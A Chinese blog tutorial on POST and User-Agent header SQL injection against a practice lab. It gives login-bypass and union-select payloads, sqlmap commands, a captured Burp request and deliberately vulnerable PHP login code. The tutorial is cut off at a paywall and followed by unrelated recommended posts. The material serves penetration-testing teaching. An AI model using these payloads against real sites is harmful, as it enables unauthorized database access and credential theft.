POST注入与HEAD注入

最新推荐文章于 2021-07-27 15:59:10 发布
最新推荐文章于 2021-07-27 15:59:10 发布
阅读量905 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45634365/article/details/114092979
版权

一、POST注入

POST注入就是使用POST进行传参的注入,本质上和GET类型的没什么区别。

SQL注入的原理

渗透测试常用工具

#最经典的POST注入——万能密码
$password=' or 1=1 -- qwe
$password=' or 1=1#

#POST注入与GET注入差别不大
#POST注入比GET注入多得多

#查看字段数
$password=' or 1=1 order by 3 -- qwe
#判断回显点
$password=' union select 1,2,3 -- qwe

#通过sqlmap进行POST注入

#--form,sqlmap去读取页面中POST传参的表单的传参名然后进行SQL注入
python sqlmap.py -u http://apple/pea/index.php --form

#获取表
python sqlmap.py -u http://apple/pea/index.php --form --tables

#提高等级
python sqlmap.py -u http://inject2.lab.aqlab.cn:81/Pass-05/index.php --form --tables --level 3 --risk 2

#其实--form并不是一种好方法
#-r 抓包,一种比较好的方法,sqlmap读取数据包文件进行SQL注入,注入处可以输入一个*号告诉sqlmap测试的点
#如果是一个登陆后的用户界面存在SQL注入,登陆后的用户需要cookie,sqlmap没有这个权限,但是-r可以读取cookie
#随机输入用户名和密码,使用Burp Suite进行抓包,将数据包复制到文本文件,将文本文件复制到sqlmap目录下

python sqlmap.py -r 1.txt

python sqlmap.py -r 1.txt --level 3 --risk 2

二、HEAD注入

PHP 中的许多预定义变量都是超全局变量,这意味着它们在一个脚本的全部作用域中都可用。

#这些超全局变量主要有:
$_REQUEST #获取GET/POST/COOKIE,COOKIE在新版本已经无法获取了
$_POST  #获取POST传参
$_GET  #获取GET的传参
$_COOKIE  #获取COOKIE的值
$_SERVER  #包含了诸如头信息(header)、路径(path)以及脚本位置(script locations)等等信息的数组

请求头
GET传参
HEADER
POST传参

#以下是通过Burp对某个登录界面进行抓包得到的请求头
#我们可以得到一些关键信息,比如非登录界面使用POST传参
#User-Agent,简称UA,称为用户代理,我们可以通过Burp对其进行修改
#Referer是访问的网址
#username=admin&password=123456表示尝试输入的用户名是admin,密码是123456

POST /Pass-05/index.php HTTP/1.1
Host: inject2.lab.aqlab.cn:81
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://inject2.lab.aqlab.cn:81
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://inject2.lab.aqlab.cn:81/Pass-05/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

username=admin&password=123456&submit=%E7%99%BB%E5%BD%95

Http Header之User-Agent

User Agent中文名为用户代理,是Http协议中的一部分,属于头域的组成部分,User Agent也简称UA。它是一个特殊字符串头,是一种向访问网站提供你所使用的浏览器类型及版本、操作系统及版本、浏览器内核、等信息的标识。通过这个标 识,用户所访问的网站可以显示不同的排版从而为用户提供更好的体验或者进行信息统计;例如用手机访问谷歌和电脑访问是不一样的,这些是谷歌根据访问者的 UA来判断的。UA可以进行伪装。

浏览器的UA字串的标准格式:浏览器标识 (操作系统标识; 加密等级标识; 浏览器语言) 渲染引擎标识版本信息。但各个浏览器有所不同。

User-Agent大全

为了方便分析,给出该网站PHP处理登录的源码

$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_USER_AGENT'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){
   die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
   
$Insql = "INSERT INTO uagent ('uagent','username') VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';

我们可以发现,用户名和密码被拼接起来,并且使用正则表达式对单引号进行了过滤,虽然仍然有方法进行绕过,但并不是本文的重点,我们主要利用$uagent = $_SERVER[‘HTTP_USER_AGENT’]得到的UA进行渗透测试。

#简单介绍绕过正则表达式(禁止使用单引号)的方法,但并不是本文重点,如下图所示
#数据库查询语句中,第二个单引号被转义了,导致\' and password=变成了字符串
select * from user where username ='\' and password='or 1=1 -- qwe'

在这里插入图片描述

以下是$_SERVER中包含的信息,第五行数据就是用户代理UA。

最低0.47元/天 解锁文章
弈-剑
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 7
    评论
专栏目录
对$.post跟$.get重新封装,将签名和时间戳传递到Header
来年又来年的博客
02-16 4805
jQuery.each(["get", "post"], function (i, method) { jQuery[method] = function (url, data, callback, type) { if (jQuery.isFunction(data)) { type = type || callback;
jquery的$怎么发起post请求并携带自定义请求头
m0_65659549的博客
04-26 668
将 JavaScript 对象转换为 JSON 字符串,以便作为请求体发送。方法发起 POST 请求并携带自定义请求头。此外,如果你的数据是 JSON 格式的,你还需要设置。是你想要发送 POST 请求的服务器端点,函数分别定义了请求成功和失败时的回调函数。对象用来添加自定义的 HTTP 请求头,替换为你的自定义请求头的值,以及。替换为你想要发送的数据的键值对。在 jQuery 中,可以使用。指定了请求类型为 POST。对象包含了你想要发送的数据。替换为你的服务器端点,
AJAX请求 $.post方法的使用
weixin_30316097的博客
10-12 181
使用jQuery的$.post方法可以以POST形式向服务器发起AJAX请求。$.post方法是jQuery的实用工具方法。 $.post方法语法 $.post(url,parameters,callback) 参数 url (字符串)服务器端资源地址。 parameter (对象)需要传...
PHP带HeaderPOST请求
hackersmile的专栏
04-26 2311
HeaderPOST请求: /** * POST发送数据 * @param String $url 请求的地址 * @param Array $header 自定义的header数据 * @param Array $data POST的数据 * @return String */ function post($url,$data=[],$header=[]){ $ch = curl_init(); if(substr($url,0,5)=='https'){
完整的Httpclient工具类发送带params和Headerpost和get请求
qq_44742816的博客
12-27 3785
1.HttpClient工具类 public class HttpClientUtils { /** 带请求头的get请求 **/ public static String doGet(String url) throws IOException { CloseableHttpClient client=null; CloseableHttpRespo...
html $.post,jQuery $.post()方法的用法
weixin_30565101的博客
06-22 1102
在 jQuery 中,除了 $.get() 方法,我们还可以使用 $.post() 方法来通过 Ajax 向服务器请求获取数据。$.get() 方法和 $.post() 方法在使用方式上差不多,不过两者还是有一定的区别:get 方式不适合较大的数据量,并且它的请求信息会保存在浏览器缓存中,因此安全性不好;post 方式不存在上述的不足。语法:$.post(url,data,fn,type)$.po...
xUtils3:Android orm,位图,http,视图注入
02-15
请求协议支持11种谓词:GET,POST,PUT,PATCH,HEAD,MOVE,COPY,DELETE,OPTIONS,TRACE,CONNECT 支持超大文件(超过2G)上传 支持断点下载(如果服务端支持Range参数,客户端自动处理断点下载) 支持cookie...
Ajax 提交表单数据到入库的全盘操作流程分享
12-03
*******php项目中当我们要对数据库进行写入操作时,有时会因为代码没有做防sql注入工作,导致各种不可预知的错误******* 1,index.htm 这是一个很简单的注册页面l 我这是以ajax形式提交数据 代码如下: <...
Nginx服务器基础的安全配置与一些安全使用提示
09-30
12. 配置Nginx以拒绝未知的HTTP方法,例如,只允许GET、POSTHEAD等标准方法。 13. 使用安全的目录结构,将网站文件和系统文件分开,避免因权限问题导致的意外暴露。 14. 使用Nginx的access_log记录所有请求,...
web之http协议(六)-HTTP与WEB.docx
12-31
它定义了客户端(浏览器)与服务器之间的通信规范,包括请求方法(如GET、POST)、状态码(如200、400、500)以及请求头和响应头等元素。HTTP协议基于TCP/IP,是非持久连接的,即每次请求-响应交互完成后,连接会被...
java开发的基于kafka、xlog的web日志实时分析storm topology
最新发布
05-29
使用java语言开发的基于storm、kafka、xlog的web日志实时分析系统,实时分析指定时间周期内web日志中每个ip访问的各项数据指标(访问总次数,动、静态次数,GET、POSTHEAD等请求类型次数,HTTP状态码各种状态前缀...
AJAX中POST请求注意点(header头)
热门推荐
liukai6的博客
12-26 1万+
在进行AJAX请求需要注意POST的区别在我们进行AJAX请求的过程中,GET请求是简单可行的.例如 xmlhttp.open("GET","test1.txt",true); xmlhttp.send(); 这是简单可行的,我们需要把有用的数据拼接到URL后面即可,就像这样: xmlhttp.open("GET","demo_get2.asp?fname=Bill&lname=Gates"
php怎么加POST协议头,怎么给jquery跨域post请求添加头部信息?
weixin_39820136的博客
03-10 406
跨域,服务器已开放请求接口,用$post可以成功,但是无法添加header信息,用$ajax的话会把post信息换成OPTIONS发送请求,data跟header都无法发送出去,不知道有什么好的办法可以解决~~// $.post(Common.postUrl + '/wechat/register',// JSON.stringify({// ...
使用PHP的http请求客户端guzzle如何添加请求头
weixin_41882200的博客
07-27 6736
一.目录 遇到的问题 guzzle基础知识 添加请求头的两种方式 二.遇到的问题 我们的一个yii的项目,需要调用一个第三方的接口,这个接口需要请求头需要携带token信息,因此,在发送http请求时,需要在请求头上对应的token。如下图: 我们的项目请求第三方,使用的是guzzle组件,做了记录,以防以后查询使用 三.guzzle基础知识 Guzzle是一个使得利用PHP实现发送HTTP 请求,方便和web service集成的PHP 客户端模拟组件。 Guzzle介绍 简单的接口构建query
$.post的用法
djlijian的专栏
10-03 391
1、$.post() 和$.ajax() 基本类似,但是更简化了一些。jQuery插件中,$.post底层最终调用的还是$.ajax():   2,jsp页面:  &lt;script type="text/javascript" src="scripts/jquery-1.6.2.min.js"&gt;&lt;/script&gt; &lt;script type="text/javasc...
JQuery异步请求之$.post()
林高禄
08-07 8187
AJAX各种实现方式 JQuery异步请求之$.post() 语法 例子 AJAX各种实现方式 JQuery异步请求之$.post() 语法 $.post(url,[data],[callback],[type]) url:请求路径 data:请求参数 callback:回调函数 type:响应结果的类型 例子 例子:单击某个按钮,异步请求servlet,然后把响应内容返回给div jsp代码 <%@ page contentType..
jQuery中各Ajax函数:$.get(),$.post(),$.ajax(),$.getJSON()
hdhai9451的专栏
05-18 1665
jQuery.getJSON( url, [data], [callback] ) 跨域加载JSON数据。 url: 发送请求的地址 data : (可选) 待发送key/value参数 callback: (可选) 载入成功时的回调函数
jq 自定义请求头信息
qq_44647223的博客
02-09 918
可以通过自定义请求头信息的方式,从而使得服务器能够更加灵活地处理各类请求。比如判断是不是ajax请求,携带服务器错误代码号来寻找bug等等,具体的使用还要看业务逻辑。 而且,请求头有些信息是不可修改的,如Referer。 简单实验: 前端: <!DOCTYPE html> <html> <head> <title>test</title> </head> <body> <script src="https://cdn
POST请求和GET请求如何传递和接收解析参数
码农小胖哥
10-09 1万+
1. 前言接口参数应该怎么传递是每个项目应该面对的问题,这跟编程语言无关,今天来总结一波常用的接口参数传递方式。2. GET 请求GET 请求一般用来向服务器请求获取数据。总体来说目前有...
帮我优化一下代码以防止xss攻击与mysql注入攻击
06-10
好的,以下是对代码进行优化,以防止XSS攻击和MySQL注入攻击的建议: 1. 防止XSS攻击 在输出用户输入的内容时,应该对特殊字符进行转义,以避免XSS攻击。 ```php $username = htmlspecialchars($_POST['username'], ENT_QUOTES, 'UTF-8'); $password = htmlspecialchars($_POST['password'], ENT_QUOTES, 'UTF-8'); ``` 这里使用了htmlspecialchars()函数来对输入的内容进行转义,第一个参数是要转义的字符串,第二个参数是转义规则,第三个参数是字符集。 2. 防止MySQL注入攻击 在执行SQL语句时,应该使用预处理语句和绑定参数,以避免MySQL注入攻击。 ```php // 验证用户名和密码是否正确 $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username AND password = SHA(:password)'); $stmt->bindParam(':username', $username); $stmt->bindParam(':password', $password); $stmt->execute(); // 获取查询结果 $user = $stmt->fetch(PDO::FETCH_ASSOC); ``` 这里使用了PDO预处理语句和绑定参数,可以防止SQL注入攻击。在预处理语句中使用占位符(:username和:password),然后使用bindParam()函数将变量绑定到占位符上。在执行查询时,PDO会自动将变量进行转义,从而保护查询安全。 综上所述,以下是对代码进行优化后的示例: ```php <?php session_start(); // 启动会话 if ($_SERVER['REQUEST_METHOD'] == 'POST') { // 防止XSS攻击 $username = htmlspecialchars($_POST['username'], ENT_QUOTES, 'UTF-8'); $password = htmlspecialchars($_POST['password'], ENT_QUOTES, 'UTF-8'); // 链接数据库 $dsn = 'mysql:host=localhost;dbname=test;charset=utf8mb4'; $pdo = new PDO($dsn, 'root', ''); // 防止MySQL注入攻击 $stmt = $pdo->prepare('SELECT * FROM users WHERE username = :username AND password = SHA(:password)'); $stmt->bindParam(':username', $username); $stmt->bindParam(':password', $password); $stmt->execute(); // 获取查询结果 $user = $stmt->fetch(PDO::FETCH_ASSOC); if ($user) { // 登录成功,将用户信息存储到会话中 $_SESSION['username'] = $username; header('location: index.php'); // 跳转到首页 exit; } else { // 登录失败,显示错误信息 $error = '用户名或密码错误'; } } ?> <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>登录</title> </head> <body> <?php if (isset($error)) { ?> <p><?php echo $error; ?></p> <?php } ?> <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"> <label for="username">用户名:</label> <input type="text" name="username" required><br><br> <label for="password">密码:</label> <input type="password" name="password" required><br><br> <input type="submit" value="登录"> </form> </body> </html> ``` 这个示例代码中使用了htmlspecialchars()函数对用户输入进行转义,使用PDO预处理语句和绑定参数来执行SQL查询,可以有效地防止XSS攻击和MySQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

弈-剑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值